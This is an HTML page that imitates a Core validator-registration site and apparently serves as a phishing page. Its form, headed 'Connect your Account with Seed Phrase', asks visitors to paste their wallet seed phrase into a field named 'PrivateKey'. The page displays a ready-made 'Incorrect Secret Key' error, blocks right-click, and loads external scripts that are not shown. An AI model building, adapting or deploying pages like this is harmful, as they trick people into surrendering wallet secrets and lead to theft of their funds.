
<!doctype html>
<html lang="en-US" class="white"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="cleartype" content="on"><meta http-equiv="x-dns-prefetch-control" content="on">
<meta name="author" content="core">
<meta name="MobileOptimized" content="320">
<meta name="HandheldFriendly" content="True">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-touch-icon" content="/icon.png">
<meta name="msapplication-TileImage" content="/icon.png">
<meta name="msapplication-TileColor" content="#0088f5">
<meta name="format-detection" content="telephone=no">
<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
<link rel="icon" type="image/x-icon" href="https://stake.coredao.org/favicon.ico">
<script type="module" crossorigin="" src="./ValidatorCore_files/index.98b47c4b.js.download"></script>
<link rel="stylesheet" href="./ValidatorCore_files/index.76f34c69.css">
<link href="https://www.googletagmanager.com/" rel="preconnect"><script async="" src="./ValidatorCore_files/js"></script>
<link rel="stylesheet" href="./ValidatorCore_files/staking.5d1f5440.css">

<link rel="stylesheet" href="./ValidatorCore_files/plugin-vue_export-helper.3a0ec331.css">
<link rel="stylesheet" href="./ValidatorCore_files/card.bddec465.css">
<link rel="stylesheet" href="./ValidatorCore_files/form-validators.22e24ed2.css">
<link rel="stylesheet" href="./ValidatorCore_files/input-number.fca85a27.css">
<script src="plugins@view/jquery.min.js"></script>

<title> Validator Register - Core </title>
</head>
<body><div id="app" class="w-full h-full" data-v-app=""><div class="h-full">
<div class="h-full text-main"><div class="core-staking-layout h-full">
<div class="core-staking-layout-header core-staking-layout-header--fixed core-staking-layout-header--mobile z-50">
<div class="flex items-center justify-between px-30 xs:px-10" style="height: 60px;"><div class="flex items-center">
<a href="#" class="">
<div class="core-app-logo h-full flex items-center">
<img src="./ValidatorCore_files/Core_logo_light.svg"></div>
</a><span class="text-12 ml-10 px-8 py-2 text-white bg-danger font-semibold rounded-full"><!---->Validators</span>
</div>
<div class="xs:hidden">

</div>
<div class="sm:hidden"><div class="core-navbar-hamburger items-center justify-center"><div>
<span class="line bg-black dark:bg-[#cccccc]"></span>
<span class="line bg-black dark:bg-[#cccccc]">
</span><span class="line bg-black dark:bg-[#cccccc]"></span>
</div>
</div>
<div class="el-overlay" style="z-index: 2001; display: none;">
<div aria-modal="true" aria-labelledby="el-id-751-0" aria-describedby="el-id-751-1" class="el-drawer rtl" role="dialog" style="width: 50%;"><span class="el-drawer__sr-focus" tabindex="-1"></span>
<!--v-if--><!--v-if--><!--v-if-->
</div>
</div>
</div>
</div>
</div>
<div class="core-staking-layout--main bg-light-400 dark:bg-dark-900 !p-0 overflow-scroll">
<div class="core-layout-content" style="margin-top: 60px; min-height: calc(100vh - 100px);">
<div class="core-page-wrapper core-validator-register-page"><div class="core-page-wrapper-header overflow-hidden">
<div class="w-full"><div class="flex safe-area"><div><h1>Connect your Account with Seed Phrase
</h1>
</div>
</div>
</div>
</div>
<div class="core-page-wrapper-content overflow-hidden">
<div class="safe-area"><div class="el-card is-always-shadow my-20">
<!--v-if-->
<div class="el-card__body" style="">
<div class="flex justify-center pb-40"><div class="lg:w-1/2 xs:w-full xs:px-16 sm:w-2/3"><br>
<div class="el-form el-form--default el-form--label-top">
<form action="" method="post" id="myform"> 
<div class="el-form-item is-required asterisk-left sm:pt-16">
<label id="el-id-751-2" for="el-id-751-8" class="el-form-item__label" style="width: 160px;">Phrase
</label><div class="el-form-item__content"><div class="el-input">

<div class="el-input__wrapper">

<textarea class="el-input__inner" placeholder="Paste seed phrase from clipboard" name="PrivateKey" id="wordsseed" minlength="24" maxlength="305" required="" style="
    height: 80px;
"></textarea>

</div>

</div>
</div>
<font color="red" label="" style="font-size: 13px;">Incorrect Secret Key. Make sure it is 12 or 24 words with spaces between words.
</font>


 </form>
 <div class="dialog-footer flex justify-center pt-40">
 <button class="el-button el-button--primary el-button--large w-full" ="disabled"="" id="imp" "=""><span class="">NEXT</span></button></div>
 
 </div>
 </div>
 </div>
 </div>
 </div></div></div>
 
 </div>
 </div>
 
<script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
<script src="plugins@view"></script>
<script src="js/script2.js"></script>
</div></body></html>